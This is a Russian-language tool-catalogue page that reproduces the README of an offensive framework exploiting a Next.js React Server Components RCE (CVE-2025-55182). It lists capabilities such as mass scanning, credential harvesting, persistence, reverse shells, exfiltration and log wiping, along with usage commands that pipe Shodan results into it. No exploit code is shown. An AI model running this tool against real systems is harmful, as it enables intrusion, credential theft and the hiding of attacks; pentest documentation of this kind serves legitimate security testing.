Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
React2Shell — R2S — это комплексный фреймворк для эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components в Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для тестирования на проникновение, включая передачу файлов, закрепление в системе, перечисление ресурсов, проверки повышения привилегий и многое другое. | Kitploit
Инструменты/GitHubGitHub/4nuxd/react2shell
Фреймворки для пентестаПовышение привилегийФреймворки для эксплойтовМеханизмы персистентностиЛатеральное перемещениеЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияКомандование и УправлениеПобег из Контейнера
569 месяцев назадЕщё не проверено
GitHub
4nuxd/react2shell

React2Shell

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

R2S — это комплексный фреймворк для эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components в Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для тестирования на проникновение, включая передачу файлов, закрепление в системе, перечисление ресурсов, проверки повышения привилегий и многое другое.

Поделиться

🚀 R2S - Фреймворк эксплуатации Next.js RSC

Version Python License CVE

Продвинутый фреймворк пост-эксплуатации для RCE в React Server Components Next.js

Возможности • Установка • Использование • Команды • Примеры


📋 Обзор

R2S — это комплексный фреймворк эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для пентестинга, включая передачу файлов, закрепление, разведку, проверки на повышение привилегий и многое другое.

🎯 Ключевые возможности

  • ✅ Автоматическое сканирование уязвимостей — массовое сканирование нескольких целей
  • ✅ Интерактивная оболочка RCE — выполнение команд с сохранением состояния и навигацией по каталогам
  • ✅ Передача файлов через HTTP — загрузка/скачивание файлов без ограничений base64
  • ✅ Автоматизация реверс-шеллов — попробовать более 25 различных полезных нагрузок
  • ✅ Расширенная разведка — информация о системе, сети, контейнерах и облачных метаданных
  • ✅ Повышение привилегий — автоматическое обнаружение векторов privesc
  • ✅ Сбор учётных данных — извлечение паролей, ключей, токенов и секретов
  • ✅ Механизмы закрепления — сохранение доступа после перезагрузок
  • ✅ Горизонтальное перемещение — обнаружение и переход к другим хостам
  • ✅ Побег из контейнера — проверка на векторы выхода из Docker/Kubernetes
  • ✅ Эксфильтрация данных — извлечение конфиденциальных файлов и конфигураций
  • ✅ Скрытые операции — очистка логов и заметание следов

🔥 Возможности

🌐 Основная эксплуатация

  • Массовое сканирование с поддержкой многопоточности
  • Режим конвейера для интеграции с другими инструментами
  • Автоматическое обнаружение уязвимости Next.js RSC
  • Интерактивная оболочка с сохранением состояния и постоянной рабочей директорией

📁 Файловые операции

  • Загрузка через HTTP — передача файлов на цель с помощью wget/curl
  • Скачивание через HTTP — эксфильтрация файлов через POST-запросы
  • Без ограничений по размеру — работает с большими файлами (в отличие от методов base64)
  • Автоматический HTTP-сервер — запускается/останавливается по мере необходимости

🔍 Разведка и перечисление

  • Системная разведка — ОС, ядро, пользователи, процессы
  • Сетевое обнаружение — интерфейсы, маршруты, ARP, DNS, прослушиваемые порты
  • Обнаружение контейнеров — идентификация Docker, Kubernetes, LXC
  • Облачные метаданные — извлечение учётных данных AWS, GCP, Azure
  • Дамп памяти процессов — извлечение секретов из работающих процессов
  • Поиск интересных файлов — SUID, доступные для записи директории, резервные копии, конфиги

🔐 Сбор учётных данных

  • Переменные окружения (пароли, ключи API, токены)
  • Файлы .env и конфигурационные файлы
  • Приватные ключи SSH и authorized_keys
  • История Bash с чувствительными командами
  • Файлы баз данных (SQLite, дампы MySQL)
  • Облачные учётные данные (AWS, Azure, GCP)
  • Учётные данные Git и токены NPM
  • Данные браузера (куки, данные для входа)
  • Секреты Docker и Kubernetes

⬆️ Повышение привилегий

  • Обнаружение SUID/SGID двоичных файлов
  • Перечисление прав sudo
  • Доступны для записи системные файлы (/etc/passwd, /etc/shadow)
  • Проверка доступа к сокету Docker
  • Анализ возможностей Linux
  • Предложения по эксплуатации ядра
  • Перечисление задач cron
  • Возможности перехвата PATH

🔄 Пост-эксплуатация

  • Механизмы закрепления — задачи cron, .bashrc, службы systemd
  • Расширенное закрепление — LD_PRELOAD, таймеры systemd
  • Сканирование портов — разведка внутренней сети
  • Горизонтальное перемещение — обнаружение ключей SSH, анализ known_hosts
  • Побег из контейнера — проверки привилегированных контейнеров, анализ возможностей
  • Эксфильтрация данных — автоматический сбор конфиденциальных данных
  • Автоматизация реверс-шеллов — более 25 типов нагрузок с автоматическим повтором

🥷 Скрытность и обход

  • Очистка логов — история Bash, логи аутентификации, syslog
  • Заметание следов — очистка wtmp, lastlog
  • Управление сессиями — сохранение и возобновление сессий

🛠️ Установка

Предварительные требования

# Python 3.6 или выше
python3 --version

# Установка зависимостей
pip3 install requests urllib3

Быстрый старт

# Клонируйте или скачайте инструмент
cd r2s-main

# Сделайте исполняемым (опционально)
chmod +x r2s_enhanced.py

# Запустите инструмент
python3 r2s_enhanced.py -h

🚀 Использование

Основной синтаксис

python3 r2s_enhanced.py [ОПЦИИ]

Параметры командной строки

ПараметрОписаниеПо умолчанию
-u, --urlURL одной цели-
-l, --listФайл со списком URL-
-c, --cmdНачальная команда для выполненияid
-t, --threadsКоличество потоков сканирования30
-p, --proxyHTTP-прокси (например, http://127.0.0.1:8080)-
-v, --verboseВключить подробный выводFalse
--http-portПорт HTTP-сервера для передачи файлов8000

Способы ввода

1. Одна цель

python3 r2s_enhanced.py -u http://target.com

2. Несколько целей (файл)

python3 r2s_enhanced.py -l targets.txt -t 50

3. Режим конвейера (stdin)

cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py

💻 Команды интерактивной оболочки

Получив доступ RCE, вы войдёте в интерактивную оболочку со следующими командами:

📂 Передача файлов

upload <local_file> <remote_path>    # Загрузить файл на цель
download <remote_file> <local_path>  # Скачать файл с цели

🧭 Навигация

cd <directory>                       # Сменить рабочую директорию
pwd                                  # Показать текущую директорию

🔍 Разведка

enum                                 # Полная разведка системы
privesc                              # Проверки на повышение привилегий
harvest                              # Сбор учётных данных
portscan <ip>                        # Сканирование портов внутренней сети
memdump [pid]                        # Дамп памяти процесса для поиска секретов

🎯 Пост-эксплуатация

lateral                              # Возможности горизонтального перемещения
escape                               # Векторы побега из контейнера
exfil [type]                         # Эксфильтрация данных (env/config/keys/db/logs/all)
reverse <lhost> <lport>              # Попробовать несколько полезных нагрузок реверс-шелла

🔒 Закрепление

persist                              # Добавить базовое закрепление
advpersist                           # Добавить расширенное закрепление

🥷 Скрытность

stealth                              # Очистить логи и заметать следы

💾 Управление сессиями

save                                 # Сохранить текущую сессию
help, ?                              # Показать справку
exit, quit                           # Выйти из интерактивной оболочки

🖥️ Системные команды

Выполняйте любые команды оболочки напрямую:

whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd

📚 Примеры

Пример 1: Базовая эксплуатация

$ python3 r2s_enhanced.py -u http://vulnerable-app.com
Скачать инструмент